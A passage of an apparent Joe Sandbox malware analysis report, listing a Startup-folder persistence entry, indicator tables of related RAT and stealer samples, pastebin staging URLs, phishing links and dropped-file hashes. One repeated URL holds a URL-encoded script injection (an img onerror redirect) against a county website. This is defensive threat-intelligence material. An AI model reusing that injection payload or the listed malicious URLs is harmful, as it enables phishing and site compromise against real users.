                                                            • Execution Graph export aborted for target powershell.exe, PID 7208 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            00:53:04API Interceptor95x Sleep call for process: powershell.exe modified
                                                            00:53:13API Interceptor3312765x Sleep call for process: RegAsm.exe modified
                                                            06:53:13AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\___win________________________________________-------.lnk

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            104.20.4.235envifa.vbsGet hashmaliciousRemcosBrowse
                                                            • pastebin.com/raw/V9y5Q5vv
                                                            New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                            • pastebin.com/raw/NsQ5qTHr
                                                            Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                            • pastebin.com/raw/NsQ5qTHr
                                                            Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                            • pastebin.com/raw/NsQ5qTHr
                                                            Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                                                            • pastebin.com/raw/NsQ5qTHr
                                                            Update on Payment.jsGet hashmaliciousWSHRATBrowse
                                                            • pastebin.com/raw/NsQ5qTHr
                                                            188.114.96.3http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                                                            • asm.alcateia.org/
                                                            hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                                                            • www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
                                                            z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.bayarcepat19.click/g48c/
                                                            update SOA.exeGet hashmaliciousFormBookBrowse
                                                            • www.bayarcepat19.click/5hcm/
                                                            docs.exeGet hashmaliciousFormBookBrowse
                                                            • www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
                                                            https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                                                            • wwvmicrosx.live/office365/office_cookies/main/
                                                            http://fitur-dana-terbaru-2024.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                            • fitur-dana-terbaru-2024.pages.dev/favicon.ico
                                                            http://mobilelegendsmycode.com/Get hashmaliciousUnknownBrowse
                                                            • mobilelegendsmycode.com/favicon.ico
                                                            http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                                                            • download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
                                                            ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                            • www.chinaen.org/zi4g/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            paste.eeNhtSITq9Zp.vbsGet hashmaliciousRemcosBrowse
                                                            • 188.114.96.3
                                                            risTLdc664.vbsGet hashmaliciousFormBookBrowse
                                                            • 188.114.97.3
                                                            NTiwJrX4R4.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                            • 188.114.97.3
                                                            o45q0zbdwt.vbsGet hashmaliciousPureLog StealerBrowse
                                                            • 188.114.97.3
                                                            OIQ1ybtQdW.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                            • 188.114.96.3
                                                            1iH5ABLKIA.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                            • 188.114.96.3
                                                            vr65co3Boo.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                            • 188.114.97.3
                                                            qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                            • 188.114.96.3
                                                            asegurar.vbsGet hashmaliciousRemcosBrowse
                                                            • 188.114.97.3
                                                            dcsegura.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                                            • 188.114.97.3
                                                            s3-w.us-east-1.amazonaws.comhttps://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3EGet hashmaliciousPhisherBrowse
                                                            • 3.5.29.116
                                                            https://www.kisa.link/dANpzGet hashmaliciousPhisherBrowse
                                                            • 52.217.132.193
                                                            https://convertwithwave.comGet hashmaliciousUnknownBrowse
                                                            • 52.217.105.36
                                                            http://detection.fyiGet hashmaliciousNetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, XmrigBrowse
                                                            • 52.217.130.161
                                                            https://trello.com/c/2T5XVROVGet hashmaliciousHTMLPhisherBrowse
                                                            • 52.216.178.155
                                                            https://trk.mail.ru/c/kruxy7?clickid=mtg66f14a9e6633b800088f731w&mt_campaign=ss_mark_se_ios&mt_creat%20ive=m-%20se23.mp4&mt_gaid=&mt_idfa=&mt_network=mtg1206891918&mt_oaid=&mt_sub1=ss_mark_se_ios&mt_sub2=mtg12068%2091918&mt_sub3=1809824272&mt_sub5=ss_mark_se_iosGet hashmaliciousUnknownBrowse
                                                            • 52.216.35.105
                                                            https://www.givingday.communityschoolnaples.org/Get hashmaliciousUnknownBrowse
                                                            • 3.5.30.234
                                                            https://tiktoktv.cn/Get hashmaliciousUnknownBrowse
                                                            • 52.216.39.57
                                                            https://tt8352.com/Get hashmaliciousUnknownBrowse
                                                            • 3.5.27.255
                                                            http://metauscvxlkogimens.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
                                                            • 52.216.58.241
                                                            bitbucket.org0XVZC3kfwL.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.49
                                                            nTHivMbGpg.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.50
                                                            sRMytgfRpJ.exeGet hashmaliciousRedLineBrowse
                                                            • 185.166.143.49
                                                            envifa.vbsGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.48
                                                            sostener.vbsGet hashmaliciousNjratBrowse
                                                            • 185.166.143.50
                                                            S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                                                            • 185.166.143.50
                                                            SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                            • 185.166.143.48
                                                            SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                            • 185.166.143.50
                                                            file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                            • 185.166.143.50
                                                            https://www.getcoloringpages.com/coloring/359Get hashmaliciousUnknownBrowse
                                                            • 185.166.143.48

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            AMAZON-02UShttp://fpnc.vnvrff.com/Get hashmaliciousUnknownBrowse
                                                            • 13.33.158.14
                                                            https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3EGet hashmaliciousPhisherBrowse
                                                            • 18.202.150.204
                                                            Play_VM-NowCWhiteAudiowav012.htmlGet hashmaliciousTycoon2FABrowse
                                                            • 143.204.68.61
                                                            https://www.kisa.link/dANpzGet hashmaliciousPhisherBrowse
                                                            • 143.204.215.42
                                                            https://ca.docusign.net/Signing/EmailStart.aspx?a=ef028e9a-a228-415f-bf68-f187538d8e48&etti=24&acct=5c5d7412-9cb5-4dbf-8a78-52c1b2a30ce5&er=96c6e932-7bdc-4ccf-8eb1-c3c23bac63dcGet hashmaliciousUnknownBrowse
                                                            • 52.24.162.179
                                                            Remittance_10_0224.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 18.185.183.205
                                                            https://miro.com/app/board/uXjVLYy6Kvw=/?share_link_id=292365195661Get hashmaliciousUnknownBrowse
                                                            • 54.230.31.75
                                                            http://allstatelock.comGet hashmaliciousUnknownBrowse
                                                            • 65.9.66.68
                                                            https://we.tl/t-HZxxLlhj0aGet hashmaliciousUnknownBrowse
                                                            • 52.51.53.164
                                                            9rSeCZbjZE.msiGet hashmaliciousAteraAgentBrowse
                                                            • 13.35.58.104
                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousUnknownBrowse
                                                            • 104.26.13.205
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 104.21.54.163
                                                            Fvqw64NU4k.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.12.107
                                                            https://porn-app.com/download2Get hashmaliciousHTMLPhisherBrowse
                                                            • 188.114.96.3
                                                            https://globalairt.com/arull.php?7104797967704b536932307464507a53744a4c53704a7a4d77727273784c7a7453725374524c7a732f564c3477776474594841413d3dkkirkman@ssc.nsw.gov.auGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.25.14
                                                            Order-63729_Reference.batGet hashmaliciousAzorultBrowse
                                                            • 172.67.159.45
                                                            SentinelOculus.exeGet hashmaliciousLummaCBrowse
                                                            • 172.67.209.193
                                                            win.exeGet hashmaliciousLummaCBrowse
                                                            • 172.67.209.193
                                                            Refrence-Order#63729.pdfGet hashmaliciousAzorultBrowse
                                                            • 104.21.14.133
                                                            6.dllGet hashmaliciousUnknownBrowse
                                                            • 104.20.4.235
                                                            AMAZON-AESUScleu.cmDGet hashmaliciousUnknownBrowse
                                                            • 52.202.204.11
                                                            http://fpnc.vnvrff.com/Get hashmaliciousUnknownBrowse
                                                            • 3.233.158.26
                                                            https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3EGet hashmaliciousPhisherBrowse
                                                            • 3.5.29.116
                                                            https://www.kisa.link/dANpzGet hashmaliciousPhisherBrowse
                                                            • 54.226.116.141
                                                            https://miro.com/app/board/uXjVLYy6Kvw=/?share_link_id=292365195661Get hashmaliciousUnknownBrowse
                                                            • 44.197.221.236
                                                            https://we.tl/t-HZxxLlhj0aGet hashmaliciousUnknownBrowse
                                                            • 34.233.9.239
                                                            yakov.arm7.elfGet hashmaliciousMiraiBrowse
                                                            • 18.214.158.31
                                                            novo.arm64.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 52.73.253.16
                                                            novo.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 54.156.155.101
                                                            novo.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 54.18.3.77
                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousUnknownBrowse
                                                            • 104.26.13.205
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 104.21.54.163
                                                            Fvqw64NU4k.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.12.107
                                                            https://porn-app.com/download2Get hashmaliciousHTMLPhisherBrowse
                                                            • 188.114.96.3
                                                            https://globalairt.com/arull.php?7104797967704b536932307464507a53744a4c53704a7a4d77727273784c7a7453725374524c7a732f564c3477776474594841413d3dkkirkman@ssc.nsw.gov.auGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.25.14
                                                            Order-63729_Reference.batGet hashmaliciousAzorultBrowse
                                                            • 172.67.159.45
                                                            SentinelOculus.exeGet hashmaliciousLummaCBrowse
                                                            • 172.67.209.193
                                                            win.exeGet hashmaliciousLummaCBrowse
                                                            • 172.67.209.193
                                                            Refrence-Order#63729.pdfGet hashmaliciousAzorultBrowse
                                                            • 104.21.14.133
                                                            6.dllGet hashmaliciousUnknownBrowse
                                                            • 104.20.4.235

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousUnknownBrowse
                                                            • 3.5.25.83
                                                            • 52.216.144.11
                                                            • 104.20.4.235
                                                            • 185.166.143.50
                                                            • 188.114.96.3
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 3.5.25.83
                                                            • 52.216.144.11
                                                            • 104.20.4.235
                                                            • 185.166.143.50
                                                            • 188.114.96.3
                                                            T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 3.5.25.83
                                                            • 52.216.144.11
                                                            • 104.20.4.235
                                                            • 185.166.143.50
                                                            • 188.114.96.3
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 3.5.25.83
                                                            • 52.216.144.11
                                                            • 104.20.4.235
                                                            • 185.166.143.50
                                                            • 188.114.96.3
                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, StealcBrowse
                                                            • 3.5.25.83
                                                            • 52.216.144.11
                                                            • 104.20.4.235
                                                            • 185.166.143.50
                                                            • 188.114.96.3
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 3.5.25.83
                                                            • 52.216.144.11
                                                            • 104.20.4.235
                                                            • 185.166.143.50
                                                            • 188.114.96.3
                                                            MZs41xJfcH.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                                                            • 3.5.25.83
                                                            • 52.216.144.11
                                                            • 104.20.4.235
                                                            • 185.166.143.50
                                                            • 188.114.96.3
                                                            http://www.sunsetsafaris.com.au//homeGet hashmaliciousUnknownBrowse
                                                            • 3.5.25.83
                                                            • 52.216.144.11
                                                            • 104.20.4.235
                                                            • 185.166.143.50
                                                            • 188.114.96.3
                                                            N5mRSBWm8P.exeGet hashmaliciousQuasarBrowse
                                                            • 3.5.25.83
                                                            • 52.216.144.11
                                                            • 104.20.4.235
                                                            • 185.166.143.50
                                                            • 188.114.96.3
                                                            http://fpnc.vnvrff.com/Get hashmaliciousUnknownBrowse
                                                            • 3.5.25.83
                                                            • 52.216.144.11
                                                            • 104.20.4.235
                                                            • 185.166.143.50
                                                            • 188.114.96.3

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):323
                                                            Entropy (8bit):5.363435887027673
                                                            Encrypted:false
                                                            SSDEEP:6:Q3La/xwcz92W+P12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hz92n4M9tDLI4MWuPTAv
                                                            MD5:A92E44C0313DAFEC1988D0D379E41A2F
                                                            SHA1:C2F5644C418A81C1FB40F74298FF39D1420BFAC0
                                                            SHA-256:F3F3E681BE07C36042639B1679ACF8B2D23BE037713D5E395C48006840DBE77A
                                                            SHA-512:4F32FE6F35FC6EB4D4CF41EDEDE3C6B3FDFE31E58DA6FC7B301B1EBD3FBEEE64681C928B45E87CD556A1D32D32CB5932764EAB22FFEE11E42B8D5EB0DCFDC22C
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):0.34726597513537405
                                                            Encrypted:false
                                                            SSDEEP:3:Nlll:Nll
                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                            Malicious:false
                                                            Preview:@...e...........................................................

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5zxrcmv.44j.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_abdusf4f.udj.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bn4bqwut.c5l.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcvzgm3x.ugi.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqshfa0f.l4l.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jonxo1zk.v41.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmlv3wz5.2sc.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_moua3ibh.onf.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
